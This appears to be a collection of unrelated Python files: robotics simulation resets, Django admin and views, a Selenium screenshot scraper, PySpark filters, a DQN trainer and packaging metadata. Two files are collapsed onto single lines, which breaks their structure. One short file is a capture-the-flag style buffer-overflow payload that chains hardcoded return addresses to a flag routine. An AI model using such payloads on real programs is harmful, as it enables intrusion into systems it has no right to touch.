        self.experiment_file = "magnetic_assembly.launch"

    def reset(self):
        # Drive the arm back to its home configuration...
        rospy.wait_for_service("gazebo/set_model_configuration")
        configure = rospy.ServiceProxy("gazebo/set_model_configuration",
                                       SetModelConfiguration)
        configure(model_name=self.model_name,
                  joint_names=self.joint_names,
                  joint_positions=self.joint_positions)
        # ...remove the previous gbeam parts...
        rospy.wait_for_service("gazebo/delete_model")
        delete_model = rospy.ServiceProxy("gazebo/delete_model", DeleteModel)
        delete_model("gbeam_soup")
        # ...and respawn the scenario, then refresh the planning scene.
        # NOTE(review): return codes of both calls are discarded — failures
        # here are silent.
        res = subprocess.call(["roslaunch",
                               "costar_simulation",
                               self.experiment_file,
                               "experiment:=%s"%self.case])
        res = subprocess.call(["rosservice","call","publish_planning_scene"])


class StackExperiment(Experiment):
    '''
    Create a stack of blocks more or less at random
    Also probably reset the robot's joint states
    '''

    def reset(self):
        # Return the arm to its home configuration.
        rospy.wait_for_service("gazebo/set_model_configuration")
        configure = rospy.ServiceProxy("gazebo/set_model_configuration",
                                       SetModelConfiguration)
        configure(model_name=self.model_name,
                  joint_names=self.joint_names,
                  joint_positions=self.joint_positions)
        # select random block positions for each block
        pass


class NavigationExperiment(Experiment):
    '''
    Initialize a navigation experiment
    '''

    def reset(self):
        #TODO
        pass
python
"""Define library examples."""
python
import os


class RootDir:
    """Singleton that owns the application's root directory (``~/.stoobly``).

    Use :meth:`instance` to obtain the shared object; constructing a second
    instance directly raises ``RuntimeError``.
    """

    HOME_DIR = os.path.expanduser('~')
    DIR_NAME = '.stoobly'

    _instance = None  # class-level slot holding the singleton

    def __init__(self):
        if RootDir._instance:
            raise RuntimeError('Call instance() instead')
        else:
            self.root_dir = os.path.join(self.HOME_DIR, self.DIR_NAME)
            # makedirs(exist_ok=True) replaces the previous
            # `if not exists: mkdir` pair, closing its check-then-create
            # race and tolerating a missing parent directory.
            os.makedirs(self.root_dir, exist_ok=True)

    @classmethod
    def instance(cls):
        """Return the shared RootDir, creating it (and the directory) on first use."""
        if cls._instance is None:
            cls._instance = cls()
        return cls._instance

    @property
    def tmp_dir(self):
        """Path of the ``tmp`` sub-directory (not created automatically)."""
        return os.path.join(self.root_dir, 'tmp')
python
from django.contrib import admin
from .models import *


# Register your models here.
class ShortAdmin(admin.ModelAdmin):
    """Admin for shortened links with bulk expire / unexpire actions."""

    list_display = ['website', 'slug', 'expired', 'creation_date', 'expiration']
    actions = ['expire', 'unexpire']

    def _set_expired(self, queryset, flag):
        # Save each instance individually so per-object save() logic runs,
        # rather than a bulk UPDATE.
        for shortened in queryset:
            shortened.expired = flag
            shortened.save()

    def expire(self, request, queryset):
        """Mark every selected link as expired."""
        self._set_expired(queryset, True)
    expire.short_description = 'Expire all links'

    def unexpire(self, request, queryset):
        """Clear the expired flag on every selected link."""
        self._set_expired(queryset, False)
    unexpire.short_description = 'Unexpire all links'


admin.site.register(ShortURL, ShortAdmin)
python
# Contents: # Getting Our Feet Wet # Make a List # Check it Twice # Custom Print # Printing Pretty # Hide... # ...and Seek! # You win! # Danger, Will Robinson!!! # Bad Aim # Not Again! # Play It, Sam # Game Over # A Real Win print("### Getting Our Feet Wet ###") board = [] print("### Make a List ###") for i in range(5): board.append(['O'] * 5) print("### Check it Twice ###") # for i in board: # print(i) print("### Custom Print ###") # def print_board(board_in): # for row in board_in: # print(row) # # print_board(board) print("### Printing Pretty ###") def print_board(board_in): for row in board_in: print(" ".join(row)) print_board(board) print("### Hide... ###") from random import randint def random_row(board): return randint(0, len(board) - 1) def random_col(board): return randint(0, len(board) - 1) ship_row = random_row(board) ship_col = random_col(board) print(ship_row) print(ship_col) print("### ...and Seek! ###") # guess_row = int(input("Guess Row: ")) # guess_col = int(input("Guess Col: ")) print("### You win! ###") # if guess_row == ship_row and guess_col == ship_col: # print("Congratulations! You sank my battleship!") print("### Danger, Will Robinson!!! ###") # if guess_row == ship_row and guess_col == ship_col: # print("Congratulations! You sank my battleship!") # else: # print("You missed my battleship!") # board[guess_row][guess_col] = "X" # print_board(board) print("### Bad Aim ###") # if guess_row == ship_row and guess_col == ship_col: # print("Congratulations! You sank my battleship!") # else: # if guess_row not in range(5) or \ # guess_col not in range(5): # print("Oops, that's not even in the ocean.") # else: # print("You missed my battleship!") # board[guess_row][guess_col] = "X" # print_board(board) print("### Not Again! ###") # if guess_row == ship_row and guess_col == ship_col: # print("Congratulations! 
You sank my battleship!") # else: # if guess_row not in range(5) or \ # guess_col not in range(5): # print("Oops, that's not even in the ocean.") # elif (board[guess_row][guess_col] == 'X'): # print("You guessed that one already.") # else: # print("You missed my battleship!") # board[guess_row][guess_col] = "X" # print_board(board) print("### Play It, Sam ###") # for turn in range(4): # print("Turn", turn + 1) # guess_row = int(input("Guess Row: ")) # guess_col = int(input("Guess Col: ")) # # if guess_row == ship_row and guess_col == ship_col: # print("Congratulations! You sank my battleship!") # else: # if guess_row not in range(5) or \ # guess_col not in range(5): # print("Oops, that's not even in the ocean.") # elif board[guess_row][guess_col] == "X": # print("You guessed that one already.") # else: # print("You missed my battleship!") # board[guess_row][guess_col] = "X" # print_board(board) print("### Game Over ###") # for turn in range(4): # print("Turn", turn + 1) # guess_row = int(input("Guess Row: ")) # guess_col = int(input("Guess Col: ")) # # if guess_row == ship_row and guess_col == ship_col: # print("Congratulations! You sank my battleship!") # else: # if guess_row not in range(5) or \ # guess_col not in range(5): # print("Oops, that's not even in the ocean.") # elif board[guess_row][guess_col] == "X": # print("You guessed that one already.") # else: # print("You missed my battleship!") # board[guess_row][guess_col] = "X" # if (turn == 3): # print("Game Over") # print_board(board) print("### A Real Win ###") for turn in range(4): print("Turn", turn + 1) guess_row = int(input("Guess Row: ")) guess_col = int(input("Guess Col: ")) if guess_row == ship_row and guess_col == ship_col: print("Congratulations! 
You sank my battleship!") break else: if guess_row not in range(5) or \ guess_col not in range(5): print("Oops, that's not even in the ocean.") elif board[guess_row][guess_col] == "X": print("You guessed that one already.") else: print("You missed my battleship!") board[guess_row][guess_col] = "X" if (turn == 3): print("Game Over") print_board(board)
python
import redis

# Client using the library's default connection settings.
r = redis.Redis()


def main():
    """Print the server's INFO stats mapping to stdout."""
    print(r.info())


if __name__ == '__main__':
    main()
python
from selenium import webdriver
import multiprocessing as mp
import numpy as np
import parms
from webdriver_manager.firefox import GeckoDriverManager
from selenium.webdriver.firefox.options import Options

# Number of worker processes (and domain partitions).
NUM_WORKERS = 6

# Prepare a single headless Firefox driver; forked workers inherit it.
options = Options()
options.headless = True
driver = webdriver.Firefox(options=options,
                           executable_path=GeckoDriverManager().install())

args = parms.args

# Read the domain list and split it into NUM_WORKERS roughly equal chunks.
domains = np.array(open(args.filename).read().splitlines())
domains = np.array_split(domains, NUM_WORKERS)


def take_shot(a):
    """Screenshot every domain in partition ``a`` (partition index, str or int)."""
    for y in domains[int(a)]:
        try:
            print("[+] Trying to screenshot: ", y)
            driver.get(formaturl(y))
            path = f"{args.output}/{y}.png"
            # Strip any scheme so the file name is just host/path based.
            for scheme in ("https://", "http://"):
                path = path.replace(scheme, "")
            driver.save_screenshot(path)
        except Exception:  # was a bare except: keep best-effort, but not SystemExit/KeyboardInterrupt
            print("[--]Failed to screen shot: ", y)
        else:
            print("Success ", y)
    driver.quit()


def start_task():
    """Fan out one process per domain partition and wait for all of them."""
    # BUG FIX: the original passed args=(str(0)) — a bare string, not a
    # tuple — which only worked by accident for single-character strings.
    workers = [mp.Process(target=take_shot, args=(str(i),))
               for i in range(NUM_WORKERS)]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
    print("[++] Finished")
    driver.quit()


def formaturl(url):
    """Return ``url`` prefixed with ``http://`` unless it already has a scheme.

    Uses a prefix check; the original substring test ("https://" in url)
    wrongly accepted URLs that merely *contain* a scheme somewhere.
    """
    if url.startswith(("http://", "https://")):
        return url
    return "http://" + url


if __name__ == '__main__':
    start_task()
python
# -*- coding: UTF-8 -*-

import unittest
import os.path
from typing import List

from wpydumps import parser
from wpydumps.model import Page

# Fixture dump that lives next to this test module.
SAMPLE_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), "sample.xml")


class TestParser(unittest.TestCase):
    def test_parse(self):
        """Parse the two-page sample dump and spot-check both pages."""
        pages: List[Page] = []

        with open(SAMPLE_PATH) as reader:
            # The bound append method serves directly as the per-page callback.
            parser.parse_pages_from_reader(
                reader, pages.append, keep_revisions_text=True
            )

        self.assertEqual(2, len(pages))
        first, second = pages

        self.assertEqual("Utilisateur:Allinde/Mise en forme", first.title)
        self.assertEqual(4, len(first.revisions))

        self.assertEqual("ANGOA", second.title)
        self.assertEqual("Association des producteurs de cinéma", second.redirect)
python
import mimetypes
import time

from django.http import HttpResponse, Http404, HttpResponseNotModified
from django.utils.http import http_date
from django.views.static import was_modified_since
from django.conf import settings

from simplethumb.models import Image
from simplethumb.spec import Spec, ChecksumException, decode_spec


# noinspection PyUnusedLocal
def serve_image(request, basename, encoded_spec, ext):
    """Serve a thumbnail described by an HMAC-signed, encoded spec.

    The spec is decoded and authenticated against the image's basename,
    mtime and the site-wide key; a bad or stale signature raises 404 so the
    endpoint cannot be abused as an open resizing proxy.
    ``ext`` is unused here — the content type is derived from the request path.
    """
    try:
        image = Image(url=basename)
    except OSError:
        # Source image missing or unreadable.
        raise Http404()

    try:
        spec = Spec.from_spec(
            decode_spec(encoded_spec, image.basename, image.mtime,
                        settings.SIMPLETHUMB_HMAC_KEY
                        )
        )
    except ChecksumException:
        # Signature mismatch (tampered URL or image changed on disk).
        raise Http404()

    image.spec = spec

    mimetype = mimetypes.guess_type(request.path)[0]

    # Honour conditional GETs before doing any rendering work.
    if not was_modified_since(request.META.get('HTTP_IF_MODIFIED_SINCE'),
                              image.mtime, image.stat.st_size):
        return HttpResponseNotModified(content_type=mimetype)

    expire_time = settings.SIMPLETHUMB_EXPIRE_HEADER

    resp = HttpResponse(
        image.render(),
        mimetype
    )
    # Cache headers: far-future Expires plus Last-Modified for revalidation.
    resp['Expires'] = http_date(time.time() + expire_time)
    resp['Last-Modified'] = http_date(image.mtime)
    return resp
python
#!/usr/bin/python
# Rebuilds the train CSV with win/loss label, scores and home/visitor flags,
# by joining each training row against per-season odds files.
import csv
import random
import numpy as np
import pandas as pd

# One odds file per season (2015-2019).  Rows are keyed by game id plus an
# 'H'/'V' marker and carry the final score in column -4.
inFile19 = "csvOdds/gameIDodds2019.csv"
iTrainFile19 = open(inFile19, "r")
readerTrain19 = csv.reader(iTrainFile19, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)

inFile18 = "csvOdds/gameIDodds2018.csv"
iTrainFile18 = open(inFile18, "r")
readerTrain18 = csv.reader(iTrainFile18, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)

inFile17 = "csvOdds/gameIDodds2017.csv"
iTrainFile17 = open(inFile17, "r")
readerTrain17 = csv.reader(iTrainFile17, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)

inFile16 = "csvOdds/gameIDodds2016.csv"
iTrainFile16 = open(inFile16, "r")
readerTrain16 = csv.reader(iTrainFile16, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)

inFile15 = "csvOdds/gameIDodds2015.csv"
iTrainFile15 = open(inFile15, "r")
readerTrain15 = csv.reader(iTrainFile15, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)

inFileTrain = "testtrainData.csv"
# inFileTrain = "fixedDataDupExamples.csv"
iTrainFile = open(inFileTrain, "r")
readerTrain = csv.reader(iTrainFile, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)

outTrainFile = "fixedWL_trainData.csv"
oTrainFile = open(outTrainFile, "w")
writerTrain = csv.writer(oTrainFile, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)

# gameId+marker -> final score, merged across all five seasons.
allScores= {}
for row in readerTrain19:
    allScores[row[0]+row[1]] = int(row[-4])
for row in readerTrain18:
    allScores[row[0]+row[1]] = int(row[-4])
for row in readerTrain17:
    allScores[row[0]+row[1]] = int(row[-4])
for row in readerTrain16:
    allScores[row[0]+row[1]] = int(row[-4])
for row in readerTrain15:
    allScores[row[0]+row[1]] = int(row[-4])

for row in readerTrain:
    currentRow = [row[0]]
    team1Score = 0
    team2Score = 0
    team1Home = 0
    team2Home = 0
    # NOTE(review): the outer try relies on KeyError from allScores to fall
    # into the "no clear Home/Visitor" branch below — control flow by exception.
    try:
        if row[0] == '':
            continue
        # Odds keys are padded with a leading "00" — assumes train game ids
        # are two digits shorter than odds ids; TODO confirm against the files.
        HScore = int(allScores["00"+row[0]+'H'])
        VScore = int(allScores["00"+row[0]+'V'])
        # print(str(row[0]))
        if int(row[2]) == HScore: ###if team1 is home
            # print("team1 is home")
            if int(row[3]) == VScore:
                # print("team2 is visitor")
                team1Score = HScore
                team2Score = VScore
                team1Home = 1
        elif int(row[2]) == VScore: #### if team1 is visitor
            # print("team1 is visitor")
            if int(row[3]) == HScore:
                # print("team2 is home")
                team1Score = VScore
                team2Score = HScore
                team2Home = 1
        else:
            print("possible game mismatch. score did not match either team")
        # Output layout: id, win/loss, scores, team1 home flag, team1 features
        # (cols 5-706), team2 home flag, team2 features (cols 708+).
        if team1Score > team2Score:
            currentRow.append(1)
        else:
            currentRow.append(0)
        currentRow.append(team1Score)
        currentRow.append(team2Score)
        currentRow.append(team1Home)
        for i in range(5,707):
            currentRow.append(row[i])
        currentRow.append(team2Home)
        for i in range(708,len(row)):
            currentRow.append(row[i])
        writerTrain.writerow(currentRow)
    except:
        try:
            # print("no clear Home/Visitor - " + row[0])
            # Game not found in the odds data: fall back to the scores
            # embedded in the train row and mark home as unknown (0.5).
            team1Home = 0.5
            team2Home = 0.5
            team1Score = int(row[2])
            team2Score = int(row[3])
            if team1Score > team2Score:
                currentRow.append(1)
            else:
                currentRow.append(0)
            currentRow.append(team1Score)
            currentRow.append(team2Score)
            currentRow.append(team1Home)
            for i in range(5,707):
                currentRow.append(row[i])
            currentRow.append(team2Home)
            for i in range(708,len(row)):
                currentRow.append(row[i])
            writerTrain.writerow(currentRow)
        except:
            # Row is malformed beyond repair; skip it.
            print("this game is just weird")
python
import struct
import sys


def p(x):
    """Pack *x* as a 32-bit little-endian unsigned integer (4 raw bytes)."""
    return struct.pack('<L', x)


# Addresses of the target binary's flag routines.
get_flag2 = 0x804892b
setup_get_flag2 = 0x8048921

# Flag 2: overflow the 112-byte buffer, then chain setup_get_flag2 -> get_flag2.
# Built as bytes throughout — the original mixed str padding with the bytes
# returned by struct.pack, which raises TypeError on Python 3.
payload = b""
payload += b"P" * 112  # padding up to the saved return address
payload += p(setup_get_flag2)
payload += p(get_flag2)

if __name__ == "__main__":
    # Emit the raw bytes; print() would write the repr of a bytes object.
    sys.stdout.buffer.write(payload + b"\n")
python
# coding: utf-8
# Polls a WordPress helper endpoint for pending updates and renders them to
# updates.htm.  Exit code 0 = nothing to do, 1 = updates available.
# Ported from Python 2 (urllib2, dict.has_key, codecs.open) to Python 3.
import sys
import json
from urllib.request import urlopen

url = urlopen("http://www.example.com/wp-admin/admin-ajax.php?action=externalUpdateCheck&secret=ABCDEFABCDEFABCDEFABCDEFABCDEFAB")
res = url.read().decode("utf-8")

# The endpoint answers the literal string "0" when no updates are pending.
if res == "0":
    sys.exit(0)

updates_input = json.loads(res)

with open("updates.htm", "w", encoding="utf-8") as updates_output:
    updates_output.write("<h1>Available updates:</h1>\n")
    for area in sorted(updates_input.keys()):
        updates_output.write("<h2>%s</h2>\n" % (area.capitalize(), ))
        if area == "core":
            # Core updates are a list of dicts with fixed keys.
            for update in updates_input[area]:
                updates_output.write("<p>New version: <strong>%s</strong></p>\n" % (update["current"], ))
                updates_output.write('<p><a href="%s">Download</a></p>\n' % (update["download"], ))
        else:
            # Plugin/theme areas map slug -> metadata dict; keys are optional.
            for update in updates_input[area].values():
                if "Name" in update:
                    updates_output.write("<h3>%s</h3>\n" % (update["Name"], ))
                if "Version" in update:
                    updates_output.write("<p>Current version: <strong>%s</strong></p>\n" % (update["Version"], ))
                if "update" in update and "new_version" in update["update"]:
                    updates_output.write("<p>New version: <strong>%s</strong></p>\n" % (update["update"]["new_version"], ))
                if "update" in update and "package" in update["update"]:
                    updates_output.write('<p><a href="%s">Download</a></p>\n' % (update["update"]["package"], ))

sys.exit(1)
python
# Services plugin for bb exporter
# 2020 - Benoît Leveugle <[email protected]>
# https://github.com/oxedions/bluebanquise - MIT license

from pystemd.systemd1 import Unit
from prometheus_client.core import GaugeMetricFamily


class Collector(object):
    """Prometheus collector exposing systemd unit states.

    Each configured service is reported on the ``system_services_state``
    gauge: 1.0 when its systemd SubState contains 'running', else 0.0.
    """

    def __init__(self, parameters):
        """Load one pystemd Unit per service name in *parameters*.

        Fix: ``services`` and ``services_status`` were mutable *class*
        attributes, silently shared between every Collector instance;
        they are now per-instance state.
        """
        self.services = parameters
        self.services_status = []
        print('Services collector. Loading services status:')
        for service in self.services:
            print(' - Loading ' + service)
            # _autoload connects to systemd immediately so SubState reads work.
            self.services_status.append(Unit(service, _autoload=True))
        print(self.services_status)

    def collect(self):
        """Yield the gauge with one sample per monitored service."""
        gauge_services = GaugeMetricFamily('system_services_state', 'System services status', labels=['service'])
        for idx, service in enumerate(self.services):
            result = self.services_status[idx].Unit.SubState
            # SubState is bytes under pystemd, hence the str() conversion.
            if 'running' in str(result):
                print('Services collector. Service '+service+' is running.')
                gauge_services.add_metric([service], 1.0)
            else:
                print('Services collector. Service '+service+' is stopped.')
                gauge_services.add_metric([service], 0.0)
        yield gauge_services
python
import setuptools
import os
import sys

# Get Version: make versioneer (which lives next to setup.py) importable.
sys.path.append(os.path.dirname(__file__))
import versioneer

__VERSION__ = versioneer.get_version()

# PyPI long description is taken verbatim from the README.
with open("README.md", "r") as fh:
    long_description = fh.read()

setuptools.setup(
    version=__VERSION__,
    cmdclass=versioneer.get_cmdclass(),  # wires versioneer into build/sdist
    name="puckdns",
    author="Snake-Whisper",
    author_email="[email protected]",
    description="Python API for the great free DNS Service \"PUCK\" from Daniel J. Luke (http://puck.nether.net/dns)",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/Snake-Whisper/puckdns",
    package_dir={"": "src"},  # sources live under src/ (src-layout)
    packages=setuptools.find_packages(where="src"),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    setup_requires=['pytest-runner'],
    tests_require=['pytest'],
    python_requires='>=3.6',
    # Feed the same version/release into `setup.py build_sphinx` docs builds.
    command_options={
        'build_sphinx': {
            'version': ('setup.py', __VERSION__),
            'release': ('setup.py', __VERSION__),
            'source_dir': ('setup.py', 'docs')}},
)
python
# adds the results to s3 import boto3 import os import io import scraperwiki import time import simplejson as json import gzip import pandas as pd def upload(test): AWS_KEY = os.environ['AWS_KEY_ID'] AWS_SECRET = os.environ['AWS_SECRET_KEY'] queryString = "* from aus_ads" queryResult = scraperwiki.sqlite.select(queryString) pd.DataFrame(queryResult).to_csv('aus-google-ad-data.csv.gz',compression='gzip', index=False) results = json.dumps(queryResult, indent=4) with open('aus-google-ad-data.json','w') as fileOut: fileOut.write(results) if not test: print("Uploading JSON to S3") bucket = 'gdn-cdn' session = boto3.Session( aws_access_key_id=AWS_KEY, aws_secret_access_key=AWS_SECRET, ) s3 = session.resource('s3') key = "2021/11/google-ad-data/aus-google-ad-data.json" object = s3.Object(bucket, key) object.put(Body=results, CacheControl="max-age=300", ACL='public-read') print("Done") print("Uploading CSV to S3") key2 = "2021/11/google-ad-data/aus-google-ad-data.csv.gz" s3.meta.client.upload_file('aus-google-ad-data.csv.gz', bucket, key2, ExtraArgs={"CacheControl":"max-age=300", 'ACL':'public-read'}) print("Done") upload(False)
python
"""PySpark DataFrame filtering helpers for the households aggregate pipeline."""
from typing import List
from typing import Union

from pyspark.sql import DataFrame
from pyspark.sql import functions as F
from pyspark.sql.window import Window


def filter_all_not_null(df: DataFrame, reference_columns: List[str]) -> DataFrame:
    """
    Filter rows which have NULL values in all the specified columns.
    From households_aggregate_processes.xlsx, filter number 2.

    Parameters
    ----------
    df
    reference_columns
        Columns to check for missing values in, all must be missing for the record to be dropped.
    """
    return df.na.drop(how="all", subset=reference_columns)


def filter_duplicates_by_time_and_threshold(
    df: DataFrame,
    first_reference_column: str,
    second_reference_column: str,
    third_reference_column: str,
    fourth_reference_column: str,
    time_threshold: float = 1.5,
    float_threshold: float = 0.00001,
) -> DataFrame:
    """
    Drop duplicates based on two identitical column values if third and fourth column and not both within
    a threshold difference from the first duplicate record.
    From households_aggregate_processes.xlsx, filter number 4.

    Parameters
    ----------
    df
    first_reference_column
        First column with duplicate value
    second_reference_column
        Second column with duplicate value
    third_reference_column
        Column used for time based threshold difference, timestamp
    fourth_reference_column
        Column used for numeric based threshold difference, float
    """
    window = Window.partitionBy(first_reference_column, second_reference_column).orderBy(third_reference_column)

    # Rank records within each duplicate group; rank 1 is always kept.
    df = df.withColumn("duplicate_id", F.row_number().over(window))
    # Hours between this record's timestamp and the group's first record.
    df = df.withColumn(
        "within_time_threshold",
        (
            F.abs(
                F.first(third_reference_column).over(window).cast("long")
                - F.col(third_reference_column).cast("long")
            )
            / (60 * 60)
        )
        < time_threshold,
    )
    df = df.withColumn(
        "within_float_threshold",
        F.abs(F.first(fourth_reference_column).over(window) - F.col(fourth_reference_column)) < float_threshold,
    )
    # Drop later duplicates only when BOTH thresholds are satisfied.
    df = df.filter((F.col("duplicate_id") == 1) | ~(F.col("within_time_threshold") & (F.col("within_float_threshold"))))
    return df.drop("duplicate_id", "within_time_threshold", "within_float_threshold")


def filter_by_cq_diff(
    df: DataFrame, comparing_column: str, ordering_column: str, tolerance: float = 0.00001
) -> DataFrame:
    """
    This function works out what columns have a float value difference less than 10-^5 or 0.00001
    (or any other tolerance value inputed) given all the other columns are the same and considers
    it to be the same dropping or deleting the repeated values and only keeping one entry.

    Parameters
    ----------
    df
    comparing_column
    ordering_column
    tolerance
    """
    # Group on every column except the one being compared.
    column_list = df.columns
    column_list.remove(comparing_column)

    windowSpec = Window.partitionBy(column_list).orderBy(ordering_column)
    df = df.withColumn("first_value_in_duplicates", F.first(comparing_column).over(windowSpec))
    df = df.withColumn(
        "duplicates_first_record", F.abs(F.col("first_value_in_duplicates") - F.col(comparing_column)) < tolerance
    )

    # Keep only the first record of each near-equal run.
    difference_window = Window.partitionBy(column_list + ["duplicates_first_record"]).orderBy(ordering_column)
    df = df.withColumn("duplicate_number", F.row_number().over(difference_window))

    df = df.filter(~(F.col("duplicates_first_record") & (F.col("duplicate_number") != 1)))
    df = df.drop("first_value_in_duplicates", "duplicates_first_record", "duplicate_number")

    return df


def assign_date_interval_and_flag(
    df: DataFrame,
    column_name_inside_interval: str,
    column_name_time_interval: str,
    start_datetime_reference_column: str,
    end_datetime_reference_column: str,
    lower_interval: Union[int, float],
    upper_interval: Union[int, float],
    interval_format: str = "hours",
) -> DataFrame:
    """
    This function gives the time interval in either hours (by default) or days
    in a column by given two date columns and says whether it is inside and
    upper and lower interval. If the difference of dates is within the upper and
    lower time intervals, the function will output None and an integer 1 if the
    difference in dates are outside of those intervals.

    Parameters
    ----------
    df
    column_name_inside_interval
        Name of the column that returns whether the difference in dates are
        within the upper/lower limits if within, it will return None, if outside
        will return an integer 1.
    column_name_time_interval
        Name of the column that returns the difference between start and end
        date and adds at the end of the column name whether it is in hours or days
    start_datetime_reference_column
        Earliest date in string format yyyy-mm-dd hh:mm:ss.
    end_datetime_reference_column
        Latest date in string format yyyy-mm-dd hh:mm:ss.
    lower_interval
        Marks how much NEGATIVE time difference can have between
        end_datetime_reference_column and start_datetime_reference_column.
        Meaning how the end_datetime_reference_column can be earlier than
        start_datetime_reference_column
    upper_interval
        Marks how much POSITIVE time difference can have between
        end_datetime_reference_column and start_datetime_reference_column
    interval_format
        By default will be a string called 'hours' if upper and lower intervals
        are input as days, define interval_format to 'days'. These are the only
        two possible formats.

    Notes
    -----
    Lower_interval should be a negative value if start_datetime_reference_column
    is after end_datetime_reference_column."""
    # by default, Hours but if days, apply change factor
    if interval_format == "hours":  # to convert hours to seconds
        conversion_factor = 3600  # 1h has 60s*60min seconds = 3600 seconds
    elif interval_format == "days":
        conversion_factor = 86400  # 1 day has 60s*60min*24h seconds = 86400 seconds

    column_name_time_interval = column_name_time_interval + "_" + interval_format

    # FORMULA: (end_datetime_reference_column - start_datetime_reference_column) in
    # seconds/conversion_factor in seconds
    df = df.withColumn(
        column_name_time_interval,
        (
            F.to_timestamp(F.col(end_datetime_reference_column)).cast("long")
            - F.to_timestamp(F.col(start_datetime_reference_column)).cast("long")
        )
        / conversion_factor,  # 1 day has 60s*60min*24h seconds = 86400 seconds
    )

    return df.withColumn(
        column_name_inside_interval,
        F.when(~F.col(column_name_time_interval).between(lower_interval, upper_interval), 1).otherwise(None),
    )


def file_exclude(df: DataFrame, source_file_col: str, files_to_exclude: list):
    """
    Function to exclude specific files from pipeline processing

    Parameters
    --------
    df
    source_file_column = Column in input dataframe which contains the source file
    files_to_exclude = List of files to exclude (feed in from config)
    """
    # One filter per file name; cumulative effect drops every listed file.
    for item in files_to_exclude:
        df = df.filter(~F.col(source_file_col).isin(item))
    return df
python
from __future__ import absolute_import
from builtins import object

import numpy as np
import logging

from relaax.common import profiling
from relaax.server.common import session
from relaax.common.algorithms.lib import utils
from relaax.common.algorithms.lib import observation

from .. import dqn_config
from .. import dqn_model
from . import dqn_utils

logger = logging.getLogger(__name__)
profiler = profiling.get_profiler(__name__)


class Trainer(object):
    """DQN agent-side trainer: collects experience, computes gradients locally
    and submits them to the parameter server."""

    def __init__(self, parameter_server, metrics, exploit):
        self.ps = parameter_server
        self.metrics = metrics
        # When exploiting, callers presumably skip learning — behavior depends
        # on the surrounding agent; TODO confirm (the flag is only stored here).
        self._exploit = exploit
        self.session = session.Session(dqn_model.AgentModel())
        self.session.op_initialize()
        self.replay_buffer = dqn_utils.ReplayBuffer(dqn_config.config.replay_buffer_size,
                                                    dqn_config.config.alpha)
        # Stacks the last N frames into the network input.
        self.observation = observation.Observation(dqn_config.config.input.history)
        self.last_action = None
        self.local_step = 0
        self.last_target_weights_update = 0
        # Version tag of the weights last pulled from the parameter server.
        self.agent_weights_id = 0

    @profiler.wrap
    def begin(self):
        # Produces the first action (None until a state has been observed).
        self.get_action()

    @profiler.wrap
    def step(self, reward, state, terminal):
        """Advance one environment step: sync weights, learn, store experience,
        then pick the next action."""
        self.local_step += 1
        if self.local_step % dqn_config.config.update_target_weights_interval == 0:
            self.session.op_update_target_weights()

        self.receive_experience()
        # Only start learning once the replay buffer has warmed up.
        if self.local_step > dqn_config.config.start_sample_step:
            self.update()

        if reward is not None:
            self.ps.session.op_add_rewards_to_model_score_routine(reward_sum=reward,
                                                                  reward_weight=1)

        # metrics
        if state is not None:
            self.metrics.histogram('state', state)

        # First call of an episode has no reward yet: just record the state.
        if reward is None:
            self.observation.add_state(state)
        else:
            self.push_experience(reward, state, terminal)

        if terminal:
            # Reset frame stack between episodes.
            self.observation.add_state(None)

        assert self.last_action is None
        self.get_action()

    @profiler.wrap
    def update(self):
        experience = self.replay_buffer.sample(dqn_config.config.batch_size)
        self.send_experience(experience)

    @profiler.wrap
    def send_experience(self, experience):
        """Turn a sampled batch into gradients and push them to the PS."""
        # Columnar batch: key -> tuple of values across the sampled dicts.
        # NOTE(review): relies on every experience dict having the same key
        # order as experience[0] — verify against ReplayBuffer.
        batch = dict(zip(experience[0], zip(*[d.values() for d in experience])))

        # Double-DQN style targets: both target and online Q on next_state.
        q_next_target = self.session.op_get_q_target_value(next_state=batch["next_state"])
        q_next = self.session.op_get_q_value(state=batch["next_state"])

        feeds = dict(state=batch["state"], reward=batch["reward"],
                     action=batch["action"], terminal=batch["terminal"],
                     q_next_target=q_next_target, q_next=q_next)
        gradients = self.session.op_compute_gradients(**feeds)

        for i, g in enumerate(utils.Utils.flatten(gradients)):
            self.metrics.histogram('gradients_%d' % i, g)

        self.ps.session.op_submit_gradients(gradients=gradients, step_inc=1,
                                            agent_step=self.agent_weights_id)

    @profiler.wrap
    def receive_experience(self):
        # Pull the latest weights (and their version) from the parameter server.
        weights, self.agent_weights_id = self.ps.session.op_get_weights_signed()
        self.session.op_assign_weights(weights=weights)

    def push_experience(self, reward, state, terminal):
        """Store a (s, a, r, s', done) transition in the replay buffer."""
        assert not self.observation.is_none()
        assert self.last_action is not None

        old_state = self.observation.get_state()
        if state is not None:
            self.observation.add_state(state)

        if dqn_config.config.output.q_values:
            # Network emitted Q-values; convert to a discrete action index.
            action = np.squeeze(np.argmax(self.last_action)).astype(np.int32)
        else:
            action = self.last_action

        self.replay_buffer.append(dict(state=old_state,
                                       action=action,
                                       reward=reward,
                                       terminal=terminal,
                                       next_state=self.observation.get_state()))
        # Consumed: step() asserts this is None before choosing the next action.
        self.last_action = None

    def get_action(self):
        if self.observation.is_none():
            self.last_action = None
        else:
            q_value = self.session.op_get_q_value(state=[self.observation.get_state()])
            self.last_action = self.session.op_get_action(local_step=self.local_step,
                                                          q_value=q_value)
            assert self.last_action is not None

            # metrics
            self.metrics.histogram('action', self.last_action)
python
"""aiohttp_spotify package: public exports and distribution metadata."""

__all__ = [
    "__version__",
    "spotify_app",
    "SpotifyAuth",
    "SpotifyClient",
    "SpotifyResponse",
]

from .aiohttp_spotify_version import __version__
from .api import SpotifyAuth, SpotifyClient, SpotifyResponse
from .app import spotify_app

# Distribution metadata (mirrored in packaging config).
__uri__ = "https://github.com/dfm/aiohttp_spotify"
__author__ = "Daniel Foreman-Mackey"
__email__ = "[email protected]"
__license__ = "MIT"
__description__ = "An async Python interface to the Spotify API using aiohttp"
python
from . import views
from rest_framework.routers import SimpleRouter
from django.urls import path

